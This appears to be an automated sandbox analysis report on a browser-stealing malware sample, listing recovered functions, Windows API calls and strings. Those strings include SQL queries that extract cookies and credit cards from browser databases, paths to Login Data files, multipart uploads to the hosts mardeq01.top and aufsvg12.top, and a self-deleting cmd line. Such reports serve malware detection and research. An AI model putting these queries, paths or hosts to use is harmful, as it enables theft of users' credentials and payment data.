1630345132, xrefs: 00402CB9, 00402DFD
o, xrefs: 00402B7A
1830365600, xrefs: 00402C17, 00402D5B
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00402AF4
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 0040308C
TRUE, xrefs: 00402BE0, 00402C82, 00402D24, 00402DC6

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s$%s$%Temp%\$%d$1630345132$1830365600$FALSE$MM/YY: %d/$Name: %s$Number: %s$P#l$Pgm$SELECT host_key, path, name, encrypted_value FROM cookies$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$TRUE$WW.$\_Files\_All_CC_list.txt$\_Files\_Cookies\brave_new.txt$\files_\cc.txt$\files_\cookies\brave_new.txt$t)SWVp*$[|$xl$}l$o
API String ID: 0-3788177859
Opcode ID: f34d7bdb73af6563398712be1859d00de71f1a2202675ec188d093526087b745
Instruction ID: 826df4728c5808f641d07d5f2cac6d8e2ec3c3f96fb2fb6c06f1b2b7b25f8dd3
Opcode Fuzzy Hash: f34d7bdb73af6563398712be1859d00de71f1a2202675ec188d093526087b745
Instruction Fuzzy Hash: 103266B5E0020467DB01AB61ED46FAF7636AF5970CF14413FF800762E2E77D9A118B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040240A, Relevance: 48.0, APIs: 2, Strings: 25, Instructions: 731COMMON

Download Yara Rule

Strings

\files_\cookies\vivaldi_new.txt, xrefs: 004024E9
[|, xrefs: 00402E70
%s, xrefs: 00402BE5, 00402BF6, 00402C09, 00402C1C, 00402C2D, 00402C87, 00402C98, 00402CAB, 00402CBE, 00402CCF, 00402D29, 00402D3A, 00402D4D, 00402D60, 00402D71, 00402DCB, 00402DDC, 00402DEF, 00402E02, 00402E13
}l, xrefs: 00402E95
%s, xrefs: 00402C3C, 00402CDE, 00402D80, 00402E22
MM/YY: %d/, xrefs: 004031F7, 0040325D
%d, xrefs: 00403209, 0040326C
FALSE, xrefs: 00402C04, 00402CA6, 00402D48, 00402DEA
t)SWVp*, xrefs: 00402B86
Pgm, xrefs: 00402BBC
Name: %s, xrefs: 0040321A, 0040327D
\_Files\_Cookies\vivaldi_new.txt, xrefs: 00402415
Number: %s, xrefs: 004031E6, 0040324C
\_Files\_All_CC_list.txt, xrefs: 00402EDB
%Temp%\, xrefs: 004024D9, 00402ECB, 00402FA5
P#l, xrefs: 00402D00
xl, xrefs: 00402E9A
WW., xrefs: 00402D8E
\files_\cc.txt, xrefs: 00402FB5
1630345132, xrefs: 00402CB9, 00402DFD
o, xrefs: 00402B7A
1830365600, xrefs: 00402C17, 00402D5B
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00402AF4
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 0040308C
TRUE, xrefs: 00402BE0, 00402C82, 00402D24, 00402DC6

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s$%s$%Temp%\$%d$1630345132$1830365600$FALSE$MM/YY: %d/$Name: %s$Number: %s$P#l$Pgm$SELECT host_key, path, name, encrypted_value FROM cookies$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$TRUE$WW.$\_Files\_All_CC_list.txt$\_Files\_Cookies\vivaldi_new.txt$\files_\cc.txt$\files_\cookies\vivaldi_new.txt$t)SWVp*$[|$xl$}l$o
API String ID: 0-2253685743
Opcode ID: 75984bf21432dba0a3c812f7a2f114ebd54fe40681549c77439bd02731f971a0
Instruction ID: 4393c8b12377eb50537cd67220523f31003659fadc5ef020523fb534fa36a14b
Opcode Fuzzy Hash: 75984bf21432dba0a3c812f7a2f114ebd54fe40681549c77439bd02731f971a0
Instruction Fuzzy Hash: 1D3266B5E0010467DB01AB60ED46FAF7636AF5930CF14413FF804762E2E67D5A118B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00402569, Relevance: 48.0, APIs: 2, Strings: 25, Instructions: 731COMMON

Download Yara Rule

Strings

\files_\cookies\opera_new.txt, xrefs: 00402648
[|, xrefs: 00402E70
%s, xrefs: 00402BE5, 00402BF6, 00402C09, 00402C1C, 00402C2D, 00402C87, 00402C98, 00402CAB, 00402CBE, 00402CCF, 00402D29, 00402D3A, 00402D4D, 00402D60, 00402D71, 00402DCB, 00402DDC, 00402DEF, 00402E02, 00402E13
}l, xrefs: 00402E95
\_Files\_Cookies\opera_new.txt, xrefs: 00402574
%s, xrefs: 00402C3C, 00402CDE, 00402D80, 00402E22
MM/YY: %d/, xrefs: 004031F7, 0040325D
%d, xrefs: 00403209, 0040326C
FALSE, xrefs: 00402C04, 00402CA6, 00402D48, 00402DEA
t)SWVp*, xrefs: 00402B86
Pgm, xrefs: 00402BBC
Name: %s, xrefs: 0040321A, 0040327D
Number: %s, xrefs: 004031E6, 0040324C
\_Files\_All_CC_list.txt, xrefs: 00402EDB
%Temp%\, xrefs: 00402638, 00402ECB, 00402FA5
P#l, xrefs: 00402D00
xl, xrefs: 00402E9A
WW., xrefs: 00402D8E
\files_\cc.txt, xrefs: 00402FB5
1630345132, xrefs: 00402CB9, 00402DFD
o, xrefs: 00402B7A
1830365600, xrefs: 00402C17, 00402D5B
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00402AF4
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 0040308C
TRUE, xrefs: 00402BE0, 00402C82, 00402D24, 00402DC6

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s$%s$%Temp%\$%d$1630345132$1830365600$FALSE$MM/YY: %d/$Name: %s$Number: %s$P#l$Pgm$SELECT host_key, path, name, encrypted_value FROM cookies$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$TRUE$WW.$\_Files\_All_CC_list.txt$\_Files\_Cookies\opera_new.txt$\files_\cc.txt$\files_\cookies\opera_new.txt$t)SWVp*$[|$xl$}l$o
API String ID: 0-2779209045
Opcode ID: ae0007fdbae9eb4b091d0be08ca2c85c640abb67c2e5204c3fe9517b1ecc12a0
Instruction ID: ac9f18648a7fdb6e5e6c327a8c686ccc9dce051f1bb1188c0d58c525a7937860
Opcode Fuzzy Hash: ae0007fdbae9eb4b091d0be08ca2c85c640abb67c2e5204c3fe9517b1ecc12a0
Instruction Fuzzy Hash: 073266B5E0010467DB01AB60ED46FAF7636AF5930CF14413FF800762E2E6BD9A118B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004026C8, Relevance: 48.0, APIs: 2, Strings: 25, Instructions: 731COMMON

Download Yara Rule

Strings

[|, xrefs: 00402E70
%s, xrefs: 00402BE5, 00402BF6, 00402C09, 00402C1C, 00402C2D, 00402C87, 00402C98, 00402CAB, 00402CBE, 00402CCF, 00402D29, 00402D3A, 00402D4D, 00402D60, 00402D71, 00402DCB, 00402DDC, 00402DEF, 00402E02, 00402E13
}l, xrefs: 00402E95
%s, xrefs: 00402C3C, 00402CDE, 00402D80, 00402E22
MM/YY: %d/, xrefs: 004031F7, 0040325D
%d, xrefs: 00403209, 0040326C
FALSE, xrefs: 00402C04, 00402CA6, 00402D48, 00402DEA
t)SWVp*, xrefs: 00402B86
Pgm, xrefs: 00402BBC
Name: %s, xrefs: 0040321A, 0040327D
Number: %s, xrefs: 004031E6, 0040324C
\_Files\_All_CC_list.txt, xrefs: 00402EDB
%Temp%\, xrefs: 00402797, 00402ECB, 00402FA5
P#l, xrefs: 00402D00
xl, xrefs: 00402E9A
\_Files\_Cookies\chromium_new.txt, xrefs: 004026D3
WW., xrefs: 00402D8E
\files_\cc.txt, xrefs: 00402FB5
1630345132, xrefs: 00402CB9, 00402DFD
o, xrefs: 00402B7A
1830365600, xrefs: 00402C17, 00402D5B
\files_\cookies\chromium_new.txt, xrefs: 004027A7
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00402AF4
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 0040308C
TRUE, xrefs: 00402BE0, 00402C82, 00402D24, 00402DC6

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s$%s$%Temp%\$%d$1630345132$1830365600$FALSE$MM/YY: %d/$Name: %s$Number: %s$P#l$Pgm$SELECT host_key, path, name, encrypted_value FROM cookies$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$TRUE$WW.$\_Files\_All_CC_list.txt$\_Files\_Cookies\chromium_new.txt$\files_\cc.txt$\files_\cookies\chromium_new.txt$t)SWVp*$[|$xl$}l$o
API String ID: 0-2324063952
Opcode ID: b9bdd5a66e3ccaa89e785982f1d2b2c22ae4d755d98fdff3ece9145d9f02d2f9
Instruction ID: 09819fde07438a0f8342defc85be3965fe9b8c6aaac531778777c09d61fd140f
Opcode Fuzzy Hash: b9bdd5a66e3ccaa89e785982f1d2b2c22ae4d755d98fdff3ece9145d9f02d2f9
Instruction Fuzzy Hash: 133266B5E0020467DB01AB60ED46FAF7636AF5970CF14413FF800762E2E7BD5A118B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00419E00, Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 336registrysleepfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 00419E58
RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,000000FF), ref: 00419E7B
RegCloseKey.KERNEL32(?), ref: 00419E80
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00419EB8
RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,000000FF), ref: 00419ED5
RegCloseKey.ADVAPI32(?), ref: 00419EDA
GetUserNameW.ADVAPI32(?,?), ref: 00419EF2
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,?,?), ref: 00419FAC
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,?,?,?), ref: 0041A069
CreateDirectoryW.KERNEL32(?,00000000,?,?,?), ref: 0041A0B1
Sleep.KERNEL32(?,?,?,?), ref: 0041A0F4
GetFileAttributesW.KERNEL32(00000000,?,?,?,?), ref: 0041A10B
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?), ref: 0041A12C
Sleep.KERNEL32(?,?,?,?,?,?), ref: 0041A1CB
DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 0041A1D4
ExitProcess.KERNEL32 ref: 0041A266

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00419EAE
%Temp%\, xrefs: 00419F68, 0041A040
.txt, xrefs: 00419F7B
ProductName, xrefs: 00419E73
%wS, xrefs: 0041A153, 0041A168, 0041A17D
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00419E4E
ProcessorNameString, xrefs: 00419ECD

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseDirectoryEnvironmentExpandFileOpenQuerySleepStringsValue$AttributesCreateDeleteExitNameProcessRemoveUser
String ID: %Temp%\$%wS$.txt$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1761161733-1326491705
Opcode ID: 4eab45fd95b2fb817d0072ff4806243133d092cc15b63c42cf1d94784cd11409
Instruction ID: 8f598e14871fe970f53e94b78ff489ea7cd5fd4fb83f4aae4e728bc346795ece
Opcode Fuzzy Hash: 4eab45fd95b2fb817d0072ff4806243133d092cc15b63c42cf1d94784cd11409
Instruction Fuzzy Hash: B4C14871E00108ABDB14DBA4DC46FEE7739AF06304F14416EF105A72D2DB7DAA94CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD5, Relevance: 32.2, APIs: 13, Strings: 5, Instructions: 724fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000), ref: 0040520B
CopyFileW.KERNEL32(?,?,00000000), ref: 0040521D
CopyFileW.KERNEL32(?,?,00000000), ref: 0040522F

Part of subcall function 00401270: GetFileAttributesW.KERNEL32 ref: 00401280

Part of subcall function 004016AA: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00401B5F
Part of subcall function 004016AA: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00401C33

Part of subcall function 004A9940: _free.LIBCMT ref: 004A9953

ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00405490
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00405526
FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000208), ref: 00405538
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 0040555E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000208), ref: 0040556A
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00405590
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000208), ref: 0040559C

Strings

%wS\%wS\Cookies, xrefs: 004054C2
%wS\%wS\Web Data, xrefs: 004054E3
Temp, xrefs: 00405140, 00405187, 004051CE, 00405713, 0040575A, 004057A1
%wS\%wS\%wS.tmp, xrefs: 0040514E, 00405195, 004051DC, 00405721, 00405768, 004057AF
%wS\%wS\Login Data, xrefs: 004054A1

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCopyCreateEnvironmentExpandStrings$Handle$AttributesChangeFindNotification_free
String ID: %wS\%wS\%wS.tmp$%wS\%wS\Cookies$%wS\%wS\Login Data$%wS\%wS\Web Data$Temp
API String ID: 2073369196-934407413
Opcode ID: 5cec50f8a0f96c02a784dbff3a99ab11491d31c26163c4a1b34de3659489133b
Instruction ID: f30b4dd079169e2c61b936172f6f81c0f991cf9a9918c453632bb78c9e6b779a
Opcode Fuzzy Hash: 5cec50f8a0f96c02a784dbff3a99ab11491d31c26163c4a1b34de3659489133b
Instruction Fuzzy Hash: FD42B2B1E001089BEB14DB64CC85F9EB779EF55314F5481AEE005B72C2DB78AA84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00413960, Relevance: 24.8, APIs: 3, Strings: 11, Instructions: 346sleepCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,?,?), ref: 00413A31
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?), ref: 00413B30
Sleep.KERNEL32 ref: 00413D33

Strings

.zip, xrefs: 00413B05
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, xrefs: 00412F64
-----------------------------, xrefs: 00412A95
%Temp%\, xrefs: 004139EC, 00413AC4
-----------------------------, xrefs: 00412921
POST, xrefs: 00412FA1
mardeq01.top, xrefs: 00413D3F
--, xrefs: 00412ADC
Content-Type: multipart/form-data; boundary=---------------------------, xrefs: 00412BFC
Content-Disposition: form-data; name="file"; filename="%wS"Content-Type: application/octet-stream, xrefs: 0041295D, 00412973
\files_, xrefs: 00413A00

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Sleep
String ID: -----------------------------$Content-Disposition: form-data; name="file"; filename="%wS"Content-Type: application/octet-stream$%Temp%\$--$-----------------------------$.zip$Content-Type: multipart/form-data; boundary=---------------------------$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$POST$\files_$mardeq01.top
API String ID: 3317208590-2492939103
Opcode ID: ecee47d6d7d55dbfe12213a1851e0ac11c00a8f2eeb7b2522ad52705673919e0
Instruction ID: c613962b7a7750b4fb0f34e1f5cab2b13ed4fc161ba5e6a99ea359ea6b85636b
Opcode Fuzzy Hash: ecee47d6d7d55dbfe12213a1851e0ac11c00a8f2eeb7b2522ad52705673919e0
Instruction Fuzzy Hash: 0AC13871E001448BDB08DF68DD89BDE7776AF41309F10819EE005A7396EB7DAB84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404E60, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 122fileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,75144770,?,00000000,004BFA66,000000FF), ref: 00404E94
CreateFileW.KERNEL32 ref: 00404F54
CloseHandle.KERNEL32(00000000), ref: 00404F66
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00404F8C
CloseHandle.KERNEL32(00000000), ref: 00404F98
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00404FBE
CloseHandle.KERNEL32(00000000), ref: 00404FCA

Strings

%wS\%wS\Cookies, xrefs: 00404EF0
%wS\%wS\Web Data, xrefs: 00404F11
%wS\%wS\Login Data, xrefs: 00404ECF
%wS\Opera Stable\Local State, xrefs: 00404EA5
%wS\Local State, xrefs: 00404EAA, 00404EB2

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseCreateFileHandle$EnvironmentExpandStrings
String ID: %wS\%wS\Cookies$%wS\%wS\Login Data$%wS\%wS\Web Data$%wS\Local State$%wS\Opera Stable\Local State
API String ID: 4233800855-309331626
Opcode ID: 1c70ed2e742098feba2cac061f4cda45f454011f465587aef18c5d3ef53829af
Instruction ID: 4cd687c99e33f6a17cb5dd8309f15b3ac2aaa297768ba26640e60629b144b17e
Opcode Fuzzy Hash: 1c70ed2e742098feba2cac061f4cda45f454011f465587aef18c5d3ef53829af
Instruction Fuzzy Hash: 8E41F8B1A403187AEB70D651CC4AFDB736CEB45714F1441AAB208B71C0DBB8AAC48F69

Uniqueness

Uniqueness Score: -1.00%

Function 004192E8, Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 004192E8
GetSystemMetrics.USER32 ref: 004192F6
GetSystemMetrics.USER32 ref: 004192FC

Strings

a+,ccs=UTF-16LE, xrefs: 00419307, 00419386
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004193B3, 004193C5
[Software], xrefs: 0041939A
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004193DC
CPU: %wS (cores: %d), xrefs: 00419328
Video card: %wS, xrefs: 0041935A
Display Resolution: %d x %d, xrefs: 0041936C
Memory ram: %I64d mb, xrefs: 00419348

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MetricsSystem$Close
String ID: [Software]$CPU: %wS (cores: %d)$Display Resolution: %d x %d$Memory ram: %I64d mb$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall$Video card: %wS$a+,ccs=UTF-16LE
API String ID: 2879414002-1594792655
Opcode ID: 18857453092c7eb2069f6908b2150d82d7ff1592634a2c097e78323842338831
Instruction ID: dec3e7ab88270520698bf24f2ff28b24ae37a8baededec0281dd99bd7462320a
Opcode Fuzzy Hash: 18857453092c7eb2069f6908b2150d82d7ff1592634a2c097e78323842338831
Instruction Fuzzy Hash: 71212476E4022827C71176629C03FDF326A9F44709F0401BFFD0876282EABC6E5946ED

Uniqueness

Uniqueness Score: -1.00%

Function 004A0820, Relevance: 18.2, APIs: 12, Instructions: 208fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 004A0833
GetFileSize.KERNEL32(?,00000000,?,?), ref: 004A08B6
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?), ref: 004A08D4
ReadFile.KERNEL32(?,00000000,00000002,?,00000000,?,00000000,00000000,00000000,?,00000000,?,?), ref: 004A08E5
SetFilePointer.KERNELBASE(?,00000024,00000000,00000000,?,00000000,00000002,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004A08F2
ReadFile.KERNEL32(?,00000000,00000004,?,00000000,?,00000024,00000000,00000000,?,00000000,00000002,?,00000000,?,00000000), ref: 004A0903
SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000004,?,00000000,?,00000024,00000000,00000000,?,00000000,00000002), ref: 004A0926
ReadFile.KERNEL32(?,00000000,00000004,?,00000000,?,?,00000000,00000000,?,00000000,00000004,?,00000000,?,00000024), ref: 004A0937

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: 1cd95ed271b316b99078cb2620ad044b2705faa13a42d3976af564447fec6acb
Instruction ID: 50647b97ed04b57e66406e155cb96b111bab6fea495ef0ca5361f24bf8c76b77
Opcode Fuzzy Hash: 1cd95ed271b316b99078cb2620ad044b2705faa13a42d3976af564447fec6acb
Instruction Fuzzy Hash: CE61CE716043046FF724CE29CC92B6BB7E8EBC8744F00492EFA96D7291D678EC048B55

Uniqueness

Uniqueness Score: -1.00%

Function 004BB84F, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 004BB596: CreateFileW.KERNEL32(00000000,00000000,?,004BB8F8,?,?,00000000,?,004BB8F8,00000000,0000000C), ref: 004BB5B3

GetLastError.KERNEL32 ref: 004BB963
__dosmaperr.LIBCMT ref: 004BB96A
GetFileType.KERNEL32(00000000), ref: 004BB976
GetLastError.KERNEL32 ref: 004BB980
__dosmaperr.LIBCMT ref: 004BB989
CloseHandle.KERNEL32(00000000), ref: 004BB9A9
CloseHandle.KERNEL32(00000000), ref: 004BBAF6
GetLastError.KERNEL32 ref: 004BBB28
__dosmaperr.LIBCMT ref: 004BBB2F

Strings

H, xrefs: 004BBAB4

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 13f6585066e4836d2ea9360280a7f1ba7d38c2bfafc1e0cee5fab9d6753d585a
Instruction ID: 752fbc0b1759a25e849cd8ade8f0c8dc636d9460868ae386707ddcd3f7656c81
Opcode Fuzzy Hash: 13f6585066e4836d2ea9360280a7f1ba7d38c2bfafc1e0cee5fab9d6753d585a
Instruction Fuzzy Hash: 2EA138719041449FCF19DF69CC91BEE3BA1EF4A324F14415FE811AB3A1D7789812C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00499ED0, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 285COMMON

Download Yara Rule

Strings

@A, xrefs: 00499F3A
( J, xrefs: 0049A1FB
A, xrefs: 0049A30C
A, xrefs: 0049A032
gfff, xrefs: 0049A26C
PA, xrefs: 00499F1A, 0049A0A8, 0049A2E9
@A, xrefs: 00499F43
pKM, xrefs: 0049A13F

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: A$( J$@A$@A$PA$gfff$pKM$A
API String ID: 0-3171549586
Opcode ID: dbeb6c84fb6fbcd943eb29dc3cae2330feea15bb391ad3164bafed0401136895
Instruction ID: 589f42fd636d2b17cebd7a083a6b44ac1506d085a55cc77b5609a323480cf281
Opcode Fuzzy Hash: dbeb6c84fb6fbcd943eb29dc3cae2330feea15bb391ad3164bafed0401136895
Instruction Fuzzy Hash: F4B17EF1A076009BDB208F19EC557727BA0E751708F05417FE906963A1EB7AA8548BCE

Uniqueness

Uniqueness Score: -1.00%

Function 004B5432, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d491ee65d40a4fa447e46b5f041f64a2837d0463a83aaece487b39b6359c2bcd
Instruction ID: 0f687b186809d9f4b20d1983bde374762dbfa886e095e4e8c5f6808934c562fe
Opcode Fuzzy Hash: d491ee65d40a4fa447e46b5f041f64a2837d0463a83aaece487b39b6359c2bcd
Instruction Fuzzy Hash: 6DC10270E04644AFCB15DF99C880BEEBBB4AF5A304F04405BE505AB392DB789942CF79

Uniqueness

Uniqueness Score: -1.00%

Function 004134D0, Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 328sleepCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004135A1
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004136A0
Sleep.KERNEL32 ref: 004138A6

Strings

.zip, xrefs: 00413675
%Temp%\, xrefs: 0041355C, 00413634
aufsvg12.top, xrefs: 004138B2
\_Files, xrefs: 00413570

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Sleep
String ID: %Temp%\$.zip$\_Files$aufsvg12.top
API String ID: 3317208590-2627375502
Opcode ID: be6a9fd9be339bfa10fe685ba7c2608cf41d46f08dedb5b5563482c06cd4677a
Instruction ID: 256aa17f647f75f157ac57481b3b64106605c4c6cb15b9b36a09f63ca4cd8296
Opcode Fuzzy Hash: be6a9fd9be339bfa10fe685ba7c2608cf41d46f08dedb5b5563482c06cd4677a
Instruction Fuzzy Hash: 72C159B1E001449BDB08DF68DE49BDE7772AF81309F10815DE005AB395DB7DAB84CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00425C40, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 283fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 00425DBF

Strings

AMB, xrefs: 00425F02
delayed %dms for lock/sharing conflict at line %d, xrefs: 00425E48
bda77dda9697c463c3d0704014d51627fceee328, xrefs: 00425EDE
winOpen, xrefs: 00425E74
psow, xrefs: 00425F4D
cannot open file at line %d of [%.10s], xrefs: 00425EE8

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: AMB$bda77dda9697c463c3d0704014d51627fceee328$cannot open file at line %d of [%.10s]$delayed %dms for lock/sharing conflict at line %d$psow$winOpen
API String ID: 823142352-776273001
Opcode ID: 32caa66a9feef39ae67dfac3b5bb3f2dcf906349bbba4ae0b43f24dbfd9856be
Instruction ID: 1ec6fe39b4fe522866631aac96a7600eea2dc64e8bb542fc77e3e646fe853078
Opcode Fuzzy Hash: 32caa66a9feef39ae67dfac3b5bb3f2dcf906349bbba4ae0b43f24dbfd9856be
Instruction Fuzzy Hash: 1AA12FB16157119BEB20CF28E84676BB7A0EB84318F44092FF845D7390D779ED85CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00413DF0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00413E1C
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000208), ref: 00413E33
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00413EA1
ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00413FD9

Strings

%ComSpec%, xrefs: 00413E2E
& timeout 3 & del /f /q ", xrefs: 00413E4B
/c rd /s /q %Temp%\, xrefs: 00413E3E

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings$ExecuteFileModuleNameShell
String ID: & timeout 3 & del /f /q "$%ComSpec%$/c rd /s /q %Temp%\
API String ID: 112506409-2072338599
Opcode ID: bff3804eebdafcbfdc37687e79e33b3e99b5ad005dab62bffa40e262f7c8fa5d
Instruction ID: 88df5a4270b3baf5751a6946fe7b9b2e29f77bfe2fd51579a99ba8f08c3fd2af
Opcode Fuzzy Hash: bff3804eebdafcbfdc37687e79e33b3e99b5ad005dab62bffa40e262f7c8fa5d
Instruction Fuzzy Hash: E6512331A002089BDB04DB68DD89FDDB736EB85305F20826EF105AB2D4DB7D9A80CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004AB3DE, Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 004AB566
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004AB582
__allrem.LIBCMT ref: 004AB599
